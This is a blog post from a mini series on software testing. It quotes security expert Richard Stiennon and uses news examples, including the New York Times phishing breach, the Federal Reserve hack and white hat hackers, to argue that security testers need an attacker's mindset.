Last week I launched a mini series called Why the Testing Experts are Right. I take an excerpt from a past Testing the Limits interview and drum up some real life examples to prove that these testing experts aren’t all talk.
Last week’s installment featured a quote from Michael Bolton on “corner cases” and discussed why “it’s a fringe use case” isn’t a good reason for missing a bug. This week we’ll look at a quote from cyber security expert Richard Stiennon and discuss the special skills of a great security tester.
“Security testing of software throughout its development cycle is indeed different than quality and functionality testing. Instead of testing against end user use cases you have to have a mind set of an attacker, a completely different use case. In addition to meticulous use of security testing tools (HP-Fortify, Veracode, etc) a security tester must understand the application and how an attacker would leverage built-in functionality to subvert a system. A security tester must be diligent and detail oriented as well as imaginative and wily – a rare combination.” – Richard Stiennon
The first thing that comes to mind is the recent hacking of the New York Times. Though it’s not certain how their network was hacked, it’s speculated that an NYT staffer fell for a phishing scam. Here’s Kim Zetter, a senior reporter at Wired who covers cybercrime, speaking on NPR:
The New York Times story didn’t indicate exactly how the hackers got in, in its case, although they said that it might have done – been done through a phishing attack. And that’s often how a lot of attacks occur. A phishing attack is basically sending an email to employees, to workers and tricking them into either clicking on a malicious link, going to a website that has malware on it that’ll download to their system, or clicking on an attachment that installs malware on that computer. And that’s basically the initial doorway that they get into. And then they – from there, they route their way through the network to establish a more firm hold and install more tools.
While you won’t be able to stop people from clicking on malicious links, it’s important to have mechanisms in place that will further protect a system and detect when there’s an issue.
Even places that are supposed to be particularly secure still struggle with cyber security. The Federal Reserve confirmed that they were hacked earlier this month when attackers “exploited a temporary vulnerability in a website vendor product.”
There are lists and lists of companies and systems that have been hacked. Some had information stolen, some had their network effectively shut down. White hat hackers are continuously finding vulnerabilities large companies don’t know about or accessing sensitive networks that need to be better protected. But the thing many of these security breaches have in common is that the hackers found a way in that was unprotected. Software security testing is a highly specialized field. It’s different than finding a functional bug or evaluating usability. Security testers must know the common vulnerabilities, stay up to date whenever new tactics are developed and have the mindset of a hacker to stay one step ahead. Enter the rise of “white hat hacker” as a profession.
Organizations (not just experts) are increasingly recognizing the need for this special skill set and have turned to white hat hackers – and sometimes hackers who don’t consider themselves white hats – to fill the void. Private corporations are turning to people highly attuned to software security to try and break their systems before someone else does.
“From [Chris Miller's] home in Wildwood, his day job is top secret security for Twitter. And for the past several years his hobby has been to hack everything from iPhones to car computers – finding flaws in security for major corporations.” – KSDK
“[15-yer-old Cim] Stordal has made the Google Security Hall of Fame, been credited with disclosing a cross-site scripting bug to Apple, been thanked by Microsoft for disclosing a vulnerability to the company, and received an elite White Hat Visa card from Facebook with $500 credit on it.” – CNet
Governments are even starting to catch on to the idea that people who know security are the best people to employ for security testing. From KSDK:
In the past two years the National Security Agency added close 3,000 cyber experts to its staff with a direct appeal to hackers on its website which reads, “If you have a few, shall we say, indiscretions in your past, don’t be alarmed.” …
“To me it makes sense… to get these kind of people on our side,” says Miller. “If you want to have an attack capability then you have to hire the kind of people who know how to do that. So, it’s not a surprise they’re doing that now.”
Not all security testing experts are hackers, but the point of these examples is that security experts are fighting hackers, so they need to have similar skills and expertise. Hackers spend time and energy looking for ways to break into (or just plain break) networks, websites, applications and software. You need a security tester who is equally as dedicated, equally as creative and maybe just a little bit devious to keep up.